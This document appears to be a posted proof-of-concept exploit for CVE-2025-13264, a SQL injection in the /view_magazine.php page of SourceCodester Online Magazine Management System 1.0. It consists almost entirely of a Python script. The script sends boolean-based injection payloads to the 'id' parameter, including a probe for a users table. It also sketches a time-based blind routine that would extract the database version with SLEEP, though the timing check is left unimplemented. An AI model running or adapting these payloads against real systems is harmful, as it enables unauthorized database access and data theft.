CVE-2025-13264 SourceCodester Online Magazine Management System 1.0 SQL注入漏洞

import requests import sys # CVE-2025-13264 SQL Injection PoC # Target: SourceCodester Online Magazine Management System 1.0 # File: /view_magazine.php # Parameter: ID target_url = "http://target.com/view_magazine.php" # Blind SQL Injection payload to extract database version # Modify the payload based on target environment payloads = [ "1' AND 1=1 -- -", # True condition "1' AND 1=2 -- -", # False condition "1' AND (SELECT COUNT(*) FROM users) > 0 -- -", # Check if users table exists ] def test_sql_injection(url, param_name, payload): """Test for SQL injection vulnerability""" try: data = {param_name: payload} response = requests.get(url, params=data, timeout=10) return response.text except requests.exceptions.RequestException as e: print(f"Error: {e}") return None # Example exploitation using time-based blind SQL injection def extract_data_time_based(url, param_name): """Extract data using time-based blind SQL injection""" # Extract database version character by character extracted_data = "" for pos in range(1, 20): for char in range(32, 126): payload = f"1' AND IF(SUBSTRING(@@version,{pos},1)=CHAR({char}),SLEEP(5),0) -- -" # Implement timing check here # If response time > 5 seconds, character is correct pass return extracted_data if __name__ == "__main__": print("CVE-2025-13264 SQL Injection Test") print("Target:", target_url) # Test basic SQL injection for payload in payloads: print(f"\nTesting payload: {payload}") result = test_sql_injection(target_url, "id", payload) if result: print("Response received - analyze for SQL injection indicators")